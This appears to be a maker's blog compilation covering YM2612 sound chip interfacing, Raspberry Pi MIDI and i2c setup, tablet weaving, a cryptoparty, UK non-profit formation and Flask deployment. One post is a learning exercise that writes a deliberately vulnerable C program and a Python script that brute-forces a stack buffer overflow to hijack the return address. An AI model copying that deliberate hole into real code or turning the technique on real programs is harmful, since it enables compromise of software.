Adventures with FM sound and the YM2612

So I’ve been getting into FM synthesis lately, and after giving the TX7 a spin I’ve been really wanting to try evolving sounds for the later synth chips Yamaha made for games consoles and soundcards. At that point in history FM was one of the only realistic ways to synthesise complex sound, as there wasn’t enough time (processing) for general purpose DSP, and there wasn’t enough space (memory) for sample playback to be an option.

img_3528

One of the most famous of this range of synth chips was the YM2612, which was used in the Sega Megadrive/Genesis consoles. I got hold of a few to try, but it’s been quite a challenge to get them working, so I thought it was worth documenting the process. The YM2612 is programmed using 5 control pins and 8 data pins. You send one byte to the chip at a time – first an address to write to, then the data to write – which allows you to set a couple of hundred parameters that define 6 separate sounds. The memory on the chip is organised into a map of the global settings (top left) and the voice settings in two banks:

registers

There isn’t much documentation for these things – the main reference is for a similar chip, and it’s written in Japanese. More usefully there are software versions in emulators, and quite a few bits and pieces online from other people’s projects, along with some translations of the docs. Helpfully, the Sega documentation included a piano test sound, which is great as you have something that *should* actually make a noise as long as everything else is working.

The first problem was figuring out the timing – despite having some examples, it took me a while to realise that there is a specific order in which you have to set the control pins, and that there is one particular transition that actually triggers (latches) the data transfer to the synth:

timing

This is a timing diagram – I’m used to seeing them in datasheets, but it’s the first time I’ve needed to understand one properly (with a bit of help from David Viens). It tells us that for writing, the data (D0-D7 pins) are actually read shortly after the WR pin is set low – and to add to the fun, some of the pins (denoted by the line over them) are 0v for on, 5v for off. You can also read data from the synth, but whatever address you supply you only get a single status byte that tells you if it’s currently busy, and if either of its two internal timers have overflowed. The idea, I assume, is that you would use them for timing music accurately without the need to do it in your main CPU.
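To make that sequence concrete, here’s a rough sketch in C of how the write and status-read cycles can look on an AVR. The port and pin assignments are placeholders for whatever wiring you use, and the delays are conservative guesses rather than figures from the datasheet – treat it as an illustration of the order of operations rather than a drop-in driver:

/* Hypothetical wiring: control pins on one AVR port, D0-D7 on another.
   CS, WR and RD are active low (the lines with bars over them in the diagram). */
#define F_CPU 16000000UL   /* assuming a 16MHz part */
#include <avr/io.h>
#include <util/delay.h>

#define CTRL_PORT PORTC
#define CTRL_DDR  DDRC
#define PIN_A0 0   /* 0 = address write, 1 = data write  */
#define PIN_A1 1   /* selects register bank (part I/II)   */
#define PIN_CS 2   /* chip select, active low             */
#define PIN_WR 3   /* write strobe, active low            */
#define PIN_RD 4   /* read strobe, active low             */

#define DATA_PORT PORTD
#define DATA_DDR  DDRD
#define DATA_PIN  PIND

static void ym_bus_init(void) {
  CTRL_DDR |= _BV(PIN_A0) | _BV(PIN_A1) | _BV(PIN_CS) | _BV(PIN_WR) | _BV(PIN_RD);
  CTRL_PORT |= _BV(PIN_CS) | _BV(PIN_WR) | _BV(PIN_RD);  /* active-low lines idle high */
}

static void ym_write_byte(uint8_t a1, uint8_t a0, uint8_t value) {
  DATA_DDR = 0xff;                                /* data pins as outputs      */
  CTRL_PORT = (CTRL_PORT & ~(_BV(PIN_A0) | _BV(PIN_A1)))
            | (a0 ? _BV(PIN_A0) : 0) | (a1 ? _BV(PIN_A1) : 0);
  DATA_PORT = value;                              /* put the byte on D0-D7     */
  CTRL_PORT &= ~_BV(PIN_CS);                      /* select the chip           */
  CTRL_PORT &= ~_BV(PIN_WR);                      /* WR low latches the data   */
  _delay_us(1);
  CTRL_PORT |= _BV(PIN_WR);
  CTRL_PORT |= _BV(PIN_CS);
  _delay_us(10);                                  /* crude wait instead of polling busy */
}

/* set one register: address byte first, then the data byte */
static void ym_set_reg(uint8_t bank, uint8_t reg, uint8_t value) {
  ym_write_byte(bank, 0, reg);    /* A0=0: this byte is an address */
  ym_write_byte(bank, 1, value);  /* A0=1: this byte is the data   */
}

/* the only thing you can read back: the busy flag and timer overflows */
static uint8_t ym_read_status(void) {
  DATA_DDR = 0x00;                                /* data pins as inputs       */
  CTRL_PORT &= ~_BV(PIN_CS);
  CTRL_PORT &= ~_BV(PIN_RD);                      /* RD low: chip drives D0-D7 */
  _delay_us(1);
  uint8_t status = DATA_PIN;
  CTRL_PORT |= _BV(PIN_RD);
  CTRL_PORT |= _BV(PIN_CS);
  return status;
}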

The audio coming out needs to be amplified too – if you connect it directly to a speaker there is a danger of overloading the DAC and causing it to burn out, so you need a bit of analogue circuitry to do this. Here is an example of triggering and glitching (by writing to random addresses) the example piano sound:

I started off using an Arduino Nano, but didn’t have much success, so I switched to a bare atmega328 which was a bit easier to set up. One of the problems is that ideally you need to be able to control the 8 data GPIO pins in one go (to set the 8 bit value), which isn’t possible from the Nano as none of the ports have all 8 bits available. You also have to supply the YM2612 with a clock pulse at around 8MHz – which took me a while to get right. I tried both dividing the atmega’s 16MHz clock by 2 and outputting it on a pin, as well as a separate external oscillator, and both eventually worked – except the oscillator leaked quite badly into the audio output (there is probably a fairly simple fix to isolate this).
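For reference, the divide-by-two trick looks something like this on the atmega328 – a minimal sketch using a timer in CTC mode to toggle a pin every cycle (I’ve picked OC2A/PB3 here arbitrarily, any output-compare pin should do):

#include <avr/io.h>

/* output a square wave at F_CPU/2 (8MHz from a 16MHz part) on OC2A (PB3) */
void ym_clock_out(void) {
  DDRB |= _BV(PB3);                   /* OC2A pin as an output              */
  TCCR2A = _BV(COM2A0) | _BV(WGM21);  /* toggle OC2A on match, CTC mode     */
  TCCR2B = _BV(CS20);                 /* no prescaling                      */
  OCR2A = 0;                          /* toggle every timer tick -> F_CPU/2 */
}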

One potential problem is dodgy vintage chips. I tried two suppliers on eBay, one Chinese shop and another in the UK – all the ones I’ve tested so far worked fine, I’m happy to say. The best way of testing them is to take a second hand Sega Megadrive console and replace its YM2612 with a socket, so you can easily plug in candidates for testing – I managed without, but it would have been handy sanity-wise to know for sure that the chips worked.

yamaha_ym2612_top_metal_die_shot
(image source)

One thing that I wasted a lot of time doing was ignoring the output entirely and just trying to get the status bit to change by setting the internal timer – the idea was to make sure the chip logic was working before worrying about the audio amplifier circuitry. However, this requires the read sequence timing to work as well as the write timing – and as soon as you can listen to the output you get small clues from the DAC noise, which actually indicates whether or not the chip is running, even if no sound has been triggered.

ops

Here are some links I found helpful: the wikipedia entry for the pinout, full software documentation (for the registers) and a great blog post about putting it all together, with schematics – in French. Here is a hardware synth module with similar YMF262 chips.

My source (and soon more stuff) is here.

Debugging MIDI bytes with sonification

I’m currently working on some hardware for interfacing a Raspberry Pi 3 with MIDI. You can of course use a normal USB audio interface, and there is a ready made MIDI Hat module for the Pi already – but I only need MIDI out, and it shouldn’t be a problem to come up with something simple using the GPIO pins.


(Debugging: Wrong clock rate – but we have data! I ended up debugging by sonifying the MIDI bytes with a piezo speaker)

I followed the instructions here, expanded here and updated for Raspberry Pi 3 here – and using bits of all of them I managed to get it working in the end, so I thought it would be a good idea to document it here.

The main idea is that the Raspberry Pi already contains a serial interface we can reconfigure to send MIDI bytes, rather than bolting on lots of new hardware. All you need to do is free it up from its default purposes – allowing external terminal connections, and driving the bluetooth interface on the Pi3 – and slow it right down to the 1980s MIDI baud rate of 31250. You can then connect your MIDI cable to the Raspberry Pi’s ‘TX’ pin with a little bit of buffering hardware in between. This is needed to bring the signal up to 5V from the Pi’s 3.3V logic output (but as the recommended parts are Schmitt triggers, perhaps an additional function is to ‘hold’ the voltage for longer). I tried a normal TTL buffer and it didn’t work – but I didn’t look into this too closely. As an aside, I found a UK-made IC in my stockpile:

ukchip

On the Raspbian end of the equation we need a few tweaks to set up the Raspberry Pi. Edit /boot/cmdline.txt and remove the part that says console=serial0,115200 – this stops the kernel listening on the serial device. Next edit /boot/config.txt and add these lines to the bottom:

dtoverlay=pi3-miniuart-bt # disable bluetooth
init_uart_clock=39062500
init_uart_baud=38400
dtparam=uart0_clkrate=48000000

This disables bluetooth and scales the serial (UART) clock to the right rate relative to the Pi3’s clock – the numbers are picked so that asking for 38400 baud actually produces MIDI’s 31250 baud (38400 × 39062500 / 48000000 = 31250). Due to the switch to systemd a lot of the documentation out there is out of date, but I also ran:

sudo systemctl disable serial-getty@ttyAMA0.service

This turns off the console serial interface and stops it starting at boot – I’m not sure if it was strictly required. Then it’s a case of rebooting and compiling ttymidi (which required a small Makefile change to add -lpthread to the link line). This program sets up a MIDI device accessible by ALSA, so we can then install vkeybd (a virtual MIDI keyboard) and connect it to ttymidi in qjackctl. This is a pic of the testing setup with my trusty SU10 sampler.

miditest
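If you want a quick sanity check before involving ALSA at all, something like this can push a test note straight out of the UART. It’s a minimal sketch that assumes the serial port shows up as /dev/ttyAMA0 and that, with the config above, requesting 38400 baud gives the real MIDI rate on the wire:

#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <termios.h>

int main(void) {
  int fd = open("/dev/ttyAMA0", O_WRONLY | O_NOCTTY);
  if (fd < 0) { perror("open"); return 1; }

  struct termios tio;
  tcgetattr(fd, &tio);
  cfmakeraw(&tio);                     /* raw 8N1, no flow control          */
  cfsetospeed(&tio, B38400);           /* 38400 here = 31250 on the wire    */
  tcsetattr(fd, TCSANOW, &tio);

  unsigned char note_on[]  = {0x90, 60, 100};  /* note on, middle C, velocity 100 */
  unsigned char note_off[] = {0x80, 60, 0};    /* note off                        */

  write(fd, note_on, sizeof(note_on));
  sleep(1);
  write(fd, note_off, sizeof(note_off));
  close(fd);
  return 0;
}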

My first buffer overflow exploit

I know worryingly little about the world of computer security – I’ve probably written a huge amount of exploitable code in my time, so it’s a good idea as a programmer to spend a bit of effort finding out more about how our programs can be compromised in order to gain awareness of the issues.

The key to understanding exploits is the concept of the universal machine – the fact that trying to restrict what a computer can do is literally fighting against the laws of physics. Lots of money can be poured into software which sometimes only takes a couple of days to get compromised; it’s a Sisyphean task where the goal can only be to make it “hard enough” – as it’s likely that anything complex enough to be useful is vulnerable in some way.

Having said that, the classic exploit is quite avoidable but regrettably common – the buffer overflow, a specific kind of common bug which makes it possible to write over a program’s stack to take control of its behaviour externally. This was about as much as I knew, but I didn’t really understand the practicalities, so I thought I’d write an example to play with. There are quite a lot of examples online, but many of them are a little confusing, so I thought I’d try a simpler approach.

Here is a function called "unlock_door" – we’ll compile this into a C program and try to force it to execute even though it’s never called by the program:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void unlock_door() {
  printf("DOOR UNLOCKED!\n");
  exit(1);
}

Now we need a vulnerability. This could be something completely unrelated to "unlock_door" but called in the same program – or its library code:

void vulnerable(char *incoming_data, unsigned int len) {
    char fixed_buffer[10];
    // woop! put some variable length data in 
    // a fixed size container with no checking
    memcpy(fixed_buffer,incoming_data,len);
    // print out the return pointer, helpful for debugging the hack!
    printf("return pointer is: %p\n", 
        __builtin_return_address(0));
}

The dodgy memcpy call copies incoming_data into fixed_buffer, which is only 10 bytes big, on the stack. If incoming_data is bigger it will copy outside the reserved memory and overwrite other data on the stack. One of the other things stored on the stack is the return address – which tells the program where the function was called from so it can go back when it’s finished. If we can set incoming_data from outside the program, we can exploit it to redirect program flow and jump into unlock_door instead of returning properly.

We’ll make getting data into the program very simple indeed: a base16 encoded argument string, converted to binary data and passed to our vulnerable function in main:

unsigned int base16_decode(const char *hex, char **data) {
  unsigned int str_size = strlen(hex);
  *data = malloc(str_size/2); 
  for (unsigned int i=0; i<str_size; i+=2) {
    if (sscanf(&(hex[i]), "%2hhx", &((*data)[i/2])) != 1) {
      return 0;
    }
  }
  return str_size/2;
}

int main(int argc, char **argv) {
  char *data;
  unsigned int size = base16_decode(argv[1],&data);
  vulnerable(data,size);
  free(data);
  printf("normal exit, door is locked\n");
  exit(0);
}

That’s our vulnerable C program finished. If we run it with just a few bytes of data it operates normally and prints out the current return pointer, which points back into the main function it was called from:

$ ./dodgy_door_prog 0000000000
return pointer is: 0x40088c
normal exit, door is locked

We can now inspect it in order to figure out the exploit. The first thing we can do is run the standard binutils “nm” command on the binary, which prints out the addresses of all the functions in the executable. We can search this with grep to print the address of the target function we want to call:

$ nm dodgy_door_prog | grep unlock_door
00000000004007fa T unlock_door

The smart thing to do next is to work out where the return pointer would be relative to the fixed_buffer variable and offset this address to provide a payload to send the program – I’m not smart though, so I wrote a python program to figure it out for me:

import os

# this is stored in memory in reverse (little endian format)
unlock_door_addr = "fa0740"

def build_payload(length):
    return "00"*length+unlock_door_addr

ret = 0
count = 0
# try increasing offsets until we get the exit code from unlock_door,
# ignoring all the segfaults and bus errors etc and retrying
while ret in [0,35584,34560,34304,33792]:
    payload = build_payload(count)
    cmd = "./dodgy_door_prog "+payload
    ret = os.system(cmd)
    print cmd
    count += 1

It took me a while to figure out that addresses are stored in memory backwards to what you’d expect, as it’s a little-endian memory layout (on Intel and pretty much everything else these days). The script keeps adding zeros to offset the target address until it sits in the right bit of stack memory (you can see the return pointer gradually getting corrupted) and eventually triggers the function:

...
./dodgy_door_prog 00000000000000000000000000000000000000fa0740
return pointer is: 0x40088c
Segmentation fault (core dumped)
./dodgy_door_prog 0000000000000000000000000000000000000000fa0740
return pointer is: 0x40088c
Bus error (core dumped)
./dodgy_door_prog 000000000000000000000000000000000000000000fa0740
return pointer is: 0x40088c
Bus error (core dumped)
./dodgy_door_prog 00000000000000000000000000000000000000000000fa0740
return pointer is: 0x400840
Segmentation fault (core dumped)
./dodgy_door_prog 0000000000000000000000000000000000000000000000fa0740
return pointer is: 0x404007
Segmentation fault (core dumped)
./dodgy_door_prog 000000000000000000000000000000000000000000000000fa0740
return pointer is: 0x4007fa
DOOR UNLOCKED!

The successful offset is 24 bytes (presumably the 10 byte buffer padded to 16 for alignment, plus the 8 byte saved frame pointer). Now the good news is that this is only possible on GCC if we compile with “-fno-stack-protector”, as by default for the last year or so it checks functions that allocate arrays on the stack by pushing a random “canary” value – if the canary gets altered it stops the program before the function returns. However not all functions are checked this way as it’s slow, so it’s quite easy to circumvent – for example if the overflow happens through the address of a local variable rather than an array.

More advanced versions of this exploit also insert executable code into the stack to do things like start a shell process so you can run any commands as the program. There is also an interesting technique called “Return Oriented Programming” where you can analyse an executable to find snippets of code that end in returns (called “gadgets”) and string them together to run your own arbitrary programs. This reminds me of the recent work we’ve been doing on biological viruses, as it’s analogous to how they latch onto sections of bacterial DNA to run their own code.

Foam Kernow crypto ‘tea party’

Last night we ran an experimental cryptoparty at Foam Kernow. We hadn’t tried something like this before, nor do we have any particular expertise with cryptography – so this was run as a research gathering for interested people to find out more about it.

One of the misconceptions about cryptography I wanted to start with is that it’s just about hiding things. We looked at Applied Cryptography by Bruce Schneier, where he starts by explaining the three things that cryptography provides beyond confidentiality:

  • Authentication. It should be possible for the receiver of a message to ascertain its origin; an intruder should not be able to masquerade as someone else.
  • Integrity. It should be possible for the receiver of a message to verify that it has not been modified in transit; an intruder should not be able to substitute a false message for a legitimate one.
  • Nonrepudiation. A sender should not be able to falsely deny later that they sent the message.

It’s interesting how confidentiality is tied up with these concepts – you can’t compromise one without damaging the others. It’s also interesting how these are requirements for human communication, yet we’ve become so used to living without them.

One of the most interesting things was to hear people’s motivations for coming along to find out more about this subject. There was a general feeling of loss of control over online identity and data. Some of the more specific aspects:

  • Ambient data collection, our identity increasingly becoming a commodity – being modelled for purposes we do not have control over.
  • Centralisation of communication being a problem – e.g. gmail.
  • Never knowing when your privacy might become important – e.g. you find yourself in an abusive relationship, and suddenly it matters.
  • Knowing that privacy is something we should be thinking about but not wanting to. Similar to knowing we shouldn’t be using the car but doing it anyway.
  • Awareness that our actions don’t just affect us, but our families’, friends’ and colleagues’ privacy – needing to think about them too.
  • Worrying when googling about health, financial or legal subjects.
  • Being aware that email is monitored in the workplace.

We talked about the encryption we already use – GPG for email with Thunderbird, and Tor for browsing anonymously. One of the tricky areas we discussed was setting this kind of thing up for mobile – do you need specific apps, an entire OS or specific hardware? This is something we need to spend a bit more time looking into.

Personally speaking, I use a free firewall on my phone so I can at least control which apps can be online – and I only became aware of this from developing for android and seeing the amount of ‘calling home’ that completely arbitrary applications do regularly.

We also discussed asymmetric key pair cryptography – how the mathematics meshes so neatly with social conventions, so you can sign a message to prove you wrote it, or sign someone else’s public key to build up a ‘web of trust’.

We didn’t get very practical, this was more about discussing the issues and feelings on the topic. That might be something to think about for future cryptoparties.

Tanglebots workshop preparation

It’s workshop time again at Foam Kernow. We’re running a Sonic Kayak development open hacklab with Kaffe Matthews (more on this soon) and a series of tanglebots workshops which will be the finale to the weavingcodes project.

Instead of using my cobbled-together homemade interface board, we’re using the Pimoroni Explorer HAT (Pro). This comes with some nice features, especially a built-in breadboard, but also 8 touch buttons, 4 LEDs and two motor drivers. The only downside is that it uses the same power source as the Pi for the motors, so you need to be a little careful, as it can reset the Pi if the power draw is too great.

2hat

We have a good stock of recycled e-waste robotic toys we’re going to be using to build with (along with some secondhand lego mindstorms):

toys

Also lots of recycled building material from the amazing Cornwall Scrap Store.

material

In order to keep the workshop balanced between programming and building, and fun for all age groups, we want to use Scratch – rather than getting bogged down with python or similar. In a big improvement over previous versions of the Pi OS, the recent Raspbian release (Jessie) supports lots of extension hardware, including the Explorer HAT. Things like firing the built-in LEDs work ‘out of the box’ like this:

2scratch-led

While the two motor controllers (with speed control!) work like this:

2scratch-motor

The touch buttons were a bit harder to get working as they are not supported by default, so I had to write a Scratch driver to do this, which you can find here. Once the driver script is running (it launches automatically from the desktop icon), it communicates with Scratch over the network and registers the 8 touch buttons as sensors. This means they can be accessed in Scratch like so:

2scratch-touch
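The network side of this is presumably Scratch’s remote sensor protocol: you connect to Scratch on TCP port 42001 and send plain text messages like sensor-update "touch1" 1, each prefixed with a 4 byte big-endian length. This isn’t the actual driver code and the sensor name is made up, but a minimal sketch of the framing in C looks something like this (remote sensor connections need to be enabled in Scratch first):

#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>

/* send one remote-sensor message to Scratch listening on localhost:42001 */
static void send_sensor_update(int sock, const char *msg) {
  uint32_t len = htonl(strlen(msg));   /* 4 byte big-endian length prefix */
  send(sock, &len, 4, 0);
  send(sock, msg, strlen(msg), 0);
}

int main(void) {
  int sock = socket(AF_INET, SOCK_STREAM, 0);
  struct sockaddr_in addr = {0};
  addr.sin_family = AF_INET;
  addr.sin_port = htons(42001);                    /* Scratch remote sensor port */
  addr.sin_addr.s_addr = inet_addr("127.0.0.1");
  if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
    perror("connect");
    return 1;
  }
  /* report a (made up) touch button state as a sensor called "touch1" */
  send_sensor_update(sock, "sensor-update \"touch1\" 1");
  close(sock);
  return 0;
}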

How to warp a tablet loom (/neolithic digital computing device)

Tablet looms have some interesting properties. Firstly, they are very
very old – our neolithic ancestors invented them. Secondly they
are quite straightforward to make and weave but form an extremely
complex structure that incorporates both weaving and braiding (and one I
haven’t managed to simulate correctly yet) – they are also the only form
of weaving that has never been mechanised.

I’ve learned to warp tablets very much by trial and error, so I expect
there are many improvements possible (please let me know), but as I had
to warp a load of tablet looms for the weavecoding workshop in Düsseldorf last
week, I thought I’d document the process here.

The first thing you need to do is make the tablets themselves from
fairly stiff card. You need squares of about 5cm, and holes punched out
from the corners. Beer mats or playing cards are good, I’m just using recycled card here. It saves a bit of time later if you can get the holes lined up when
the tablets are stacked together – but I’ve never managed to do this
very well. A good number of cards to start with is 8 or 10 – fewer are
easier to manipulate and use less yarn, if you don’t have much to spare.

IMG_20160122_120729

The second step is to prepare the warp yarn. You need four separate
balls or cones of wool – it’s easiest to start with four different
colours, although you can make more patterns with double faced weave
(two colours opposite each other on the cards). Fluffy knitting wool
works fine but can catch and be annoying sometimes; cotton is better. In
order to help prevent the yarn getting tangled together – probably the
biggest problem with this job – it’s a good idea to set this up so the
yarn passes through the back of a chair with the balls on the floor like
this; it restricts the distance the balls roll as you pull the yarn.

IMG_20160122_120905

You need two sticks you can easily loop the warp over – I’m using a cut
broomstick clamped to the chair here. The distance between them determines
how long the final woven band will be; a metre or so is good.

Next you need to thread each of the four warp threads through the
corners of the tablets – each thread needs its own corner, so be careful
not to mix them up. If the holes line up you can do them all at once,
otherwise it’s one by one.

IMG_20160122_121329

Here are the tablets with all the corners threaded.

IMG_20160122_122040

Now we tie the threads together, looped over the warp stick furthest from
the yarn – this knot is temporary.

IMG_20160122_122324

Hook the other end of the warp over the stick on the other side, and
leave one of the tablets half way along. Loop it back again leaving
another tablet – go backwards and forwards repeating.

IMG_20160122_122645

I can never manage to keep the tablets in order, and usually end up with a mess like this – don’t panic if you get a similar result!

IMG_20160122_123113

When you have done all of the tablets, quickly check that every warp
pass has a card associated with it and then cut the first knot and tie
the last warp threads to the first.

IMG_20160122_123216

This gives you a continuous warp, which is good for adjusting the
tension. Group all the cards together and arrange them so the colours
are aligned – rotate them until the same colours are at the top and the bottom.

IMG_20160122_123849

This is also a good point to check the twist of the tablets so they alternate in
terms of the direction the threads are coming from. This is quite
difficult to explain with text but these images may help. It’s basically a bit easier if they are consistent when you start weaving, then you can see how changing this alters the patterns as you go.

IMG_20160122_123910

IMG_20160122_123927

You can actually reorder and flip the tablets at any time, even after
starting weaving – so none of this is critical. It’s handy to equalise
the tension between the warp threads at this point though, so grab all
the cards in alignment, put some tension on the warp and drag them up
and down the warp – if the loops at either end are not too close this
should get the lengths about the same.

Once this is done, tie all the tablets together to preserve their order
and alignment.

IMG_20160122_124223

Then tie loops of strong cord around both ends of the warp.

IMG_20160122_124426

Then you’re done – you can pull the ends off the sticks and start tablet
weaving!

IMG_20160122_124528

As I needed to transport the tablet looms I wrapped the warps (keeping the upper/lower threads separated) around cardboard tubes to keep the setup from getting tangled up. This seemed to work well:

IMG_20160122_130602

If you find one of the warp threads is too long and is causing
a tablet to droop when the warp is under tension, you can pull it tight
and tie it back temporarily – after weaving a few wefts it will hold in
place.

The two most important things I’ve learned about weaving – the older the
technique the more forgiving it is to mistakes, and you can never have
too many sticks.

Organisation hacking (part 2)

Time for the next installment in my attempt to document the sometimes opaque world of setting up a company, based on experiences founding Foam Kernow. As before ‘I Am Not A Lawyer’, as they say – so no substitute for proper legal advice here, and any corrections would be most welcome. See part 1 about the motivations for non-profit vs shareholder companies.

Company formation

Companies in the UK are founded with two documents, the ‘articles of association’ and a ‘memorandum of association’.

The articles of association broadly have two purposes. One is to state why the company has been brought into existence. The other is to strictly define the decision making process for those involved. You don’t generally need to write these documents from scratch, as we are provided with ‘model articles’ on which new companies can easily be based.

The company’s objects

A non-profit needs to describe its purpose via ‘objects’. This is important because, as explained in part one, a non-profit is strictly controlled in terms of access to its money. The objects describe what the company assets (e.g. cash) can legitimately be used for. You can’t found a non-profit for running e.g. a school and use it later for selling cars.

In contrast, the object of a company with shareholders is to provide a return on the investment for those shareholders, no more and no less. As such, for-profits do not need to provide any objects.

Articles of association are on the public record (you can pay Companies House £1 to send them to you). Naturally I’ve uploaded Foam Kernow’s articles on github :) These are based on the UK’s model articles – the main addition is the objects, which are a distilled version of Foam Brussels’ charter:

The objects for which the Company is established are to:

1.11 promote art, science and education by identifying and strengthening the areas that connect them;

1.12 embrace cultural change;

1.13 foster interdependence;

1.14 cultivate the beginner’s mind;

1.15 respecting and sharing sources;

1.16 empower participants to translate an idea into practice;

1.17 foster open source culture; and

1.18 embrace creative conflict.

So in a nutshell, the objects provide a publicly stated purpose and philosophy, such as this, for everybody involved.

Object 1.11 (the numbering scheme irks me as a programmer) was added in order to underscore the arts/sciences purpose of foam. This meant we could apply for an exemption to drop ‘limited’ from the end of the name, in order to highlight our independent research focus.

Memorandum of Association

The memorandum is an agreement between the individuals founding the organisation – it records the share of capital (in a for-profit) or the share of liability (in a non-profit), along with the names, addresses and – interestingly – eye colour of all involved.

Democracy

The standard corporate structure in a company limited by guarantee is a democratic one consisting of two levels. ‘Directors’ of a company take day-to-day decisions and responsibility, while ‘Members’ of the company have voting powers on important decisions and the ability to remove or add directors. This structure is very flexible: neither directors nor members need to be employed by the company, and it’s also possible for a company to have only a single director/member who is also employed on the payroll. This is how Foam Kernow started, and bizarrely I had to supply minutes to Companies House for a meeting with myself to appoint a new director.

There is quite a lot of confusing terminology around all this – for example an ‘executive’ director is one that is employed by the company (a CEO, for example), while a ‘non-executive’ is one that is otherwise external to the company.

As an aside, some companies are wholly owned by their employees, where all people on the payroll are made members and given votes automatically – however this is not the norm.

Organisation hacking (part 1)

Over the last six months I’ve been taking a crash course in company formation, treating it like any other investigation into a strange and esoteric technology. Last year I registered FoAM Kernow as a UK non-profit organisation in the mould of FoAM Brussels. Starting off with absolutely no knowledge at all (but with a lot of help from FoAM’s wider friends and relations), I found a lot of confusing fragments of information online, so I thought I’d document the process here as much as I can. It’s important to state that I’m not a lawyer or a professional in these matters at all, so this is no substitute for proper legal advice – and any corrections would be most welcome.

What does non-profit mean?

A non-profit company is simply one that is not allowed to have shareholders. A for-profit company can pay part of its profits, called dividends, to the set of people who own shares. In a non-profit the money outflow is more tightly controlled and can only go to employees or to pay the company’s costs. Contrary to popular belief, there is no limitation on the size of the company, how much it pays employees or the money it makes in total (there are some very large non-profits out there).

In place of shareholders, a non-profit is “limited by guarantee” – a more legally correct term for this type of organisation. Individuals guarantee a set amount against liability (debts). The default is a whopping £1 each.

As far as I understand it “limited by shares” and “limited by guarantee” are the two main different types of organisation in the UK. There are also a cluster of other subcategories: charities, community interest groups, co-operatives and social enterprises for example. These are a little bit more fuzzy it seems, but they tend to be different flavours of limited by guarantee companies with more legal paperwork (especially in the case of charities) to determine the precise purpose and role of the organisation, and ultimately access to profits – what the money can and can’t be used for.

Why form a company?

Having a legal entity to work from, rather than being an individual (sole trader), is better for larger projects, and bigger institutions are happier collaborating with legal entities. This is partly a matter of indirection or abstraction – e.g. if I get hit by the proverbial bus, the legal entity continues to exist. More importantly, it means multiple people can work together as part of a legal structure with a publicly stated set of shared values (called the articles of association). There is also a well established democratic process for making organisational decisions (more on that later).

Sole traders on the other hand can employ as many people as they want, but the structure would be fixed as a simple hierarchy – and the organisation has no legally defined purpose. Also things like insurance are different, but I won’t get into that yet!

Why form a non profit company?

A non-profit fits well with the goals of FoAM. Generally we focus on exploring ways of doing independent research, being strict on non-exclusive rights to our work (participating in free software and Creative Commons) and finding a place between the arts and sciences. None of this requires conventional fund raising by selling shares.

Another big reason is an issue of trust. We work mainly with people in spheres of arts and research – and it turns out a lot of people don’t want to work with companies that are run on a for-profit basis. In fact I would go so far as to say that some of the most interesting people we work with are wary of this. There is a somewhat justifiable worry that their contribution may be exploited via pressures to make a return on investments made by third parties.

The downsides are mainly tax related – for-profit companies can use dividends, which are not taxed, to pay investors (who can be employees too), and this is a very common practice. Usually small companies employ people at the minimum taxable wage and pay the rest in dividends. There is no way to do this with a company limited by guarantee – all payments to people need to be accounted for as normal employment or subcontracting, and are subject to income tax. It turns out that there are other upsides to being a non-profit that may counteract this in the long run, as you get treated differently in some contexts (e.g. banking). For the next installment (if I find time!) I’d like to talk more about that, and about the formation process too…

Connecting Flask to Apache

When exploring the cosmos of python-powered web frameworks it’s easy to get lost due to fast-moving versions. Recently we had a lot of difficulty getting Flask connected via a WSGI script on Apache. This seems to be due to needing the object factory to be called explicitly rather than relying on the module namespace to do the work for us – there doesn’t seem to be much help online about this yet. We’re also running python in a virtualenv, so the working wsgi script looks like this:

#!/usr/bin/python
import sys
import logging
import os

logging.basicConfig(stream=sys.stderr)
PROJECT_DIR = "/var/www/yourflasksite/"
activate_this = os.path.join(PROJECT_DIR, 'bin', 'activate_this.py')
execfile(activate_this, dict(__file__=activate_this))

sys.path.append(PROJECT_DIR)
from app import create_app
application=create_app(os.getenv('FLASK_CONFIG') or 'default')
application.secret_key = "your site's key"

For completeness, here is the Apache config that starts it up:

<VirtualHost *:80>
    ServerName your.url
    WSGIScriptAlias / /var/www/yourflasksite/yoursite.wsgi
    <Directory /var/www/yourflasksite/app>
	Order allow,deny
        Allow from all
    </Directory>
    Alias /static /var/www/yourflasksite/app/static
    <Directory /var/www/yourflasksite/app/static/>
        Order allow,deny
        Allow from all
    </Directory>
    ErrorLog ${APACHE_LOG_DIR}/yourflasksite-error.log
    LogLevel warn
    CustomLog ${APACHE_LOG_DIR}/yourflasksite-access.log combined
</VirtualHost>

Adventures with i2c

In order to design the next version of the flotsam hardware I need to make it cheaper and easier to build. The existing hardware was very cheap in terms of components, but expensive in terms of the time it took to construct! With this lesson learned, and with a commission on the horizon, I need to find a simpler and more flexible approach to communication between custom hardware and the Raspberry Pi – mainly one that doesn’t require so many wires.

i2c is a serial communication standard used by all kinds of components from sensors to LCD displays. The Raspberry Pi comes with it built in, as the Linux kernel supports it along with various tools for debugging. I also have some Atmel processors from a previous project and there is quite a bit of example code for them. I thought I would post a little account of my troubleshooting on this for others that follow the same path, as I feel there is a lot of undocumented knowledge surrounding these slightly esoteric electronics.

The basic idea of i2c is that you can pass data between a large number of independent components using only two wires to connect them all. One is for data, the other is for a clock signal used for synchronisation.

Debugging LEDs

I started off with the attiny85 processor, mainly as it was the first one I found, along with this very nice and clear library. I immediately ran into a couple of problems. One was that while it has support for serial communication built in (USI), you have to implement i2c on top of this, so your code needs to do a lot more. The second was that with only 8 pins the attiny85 is not great for debugging. I enabled i2c on the Raspberry Pi, hooked it up and ran i2cdetect – no joy. After a lot of fiddling around with pull-up resistors and changing voltages between 3 and 5V, either no devices were detected or all of them were, with all reads returning 0 (presumably logic pulled high for everything) or noise – nothing seemed to make any difference.

After a while (and trying other i2c slave libraries to no avail) I switched to an atmega328 processor, using this library which includes a Makefile! One thing I’ve noticed that would make learning this stuff much easier is more complete toolchains in example code, including the right #defines and fuse settings for the processor. However this code didn’t work either at first, and my attempts at using debugging LEDs on PORTB failed until I figured out they were conflicting with the UART I/O used in the example code – after working out that this wasn’t part of the i2c code I removed it, and the Raspberry Pi could at last see the device with i2cdetect. With the addition of some LEDs I could check that bytes being sent were correctly being written to the internal buffer at the correct addresses.

It finally works!

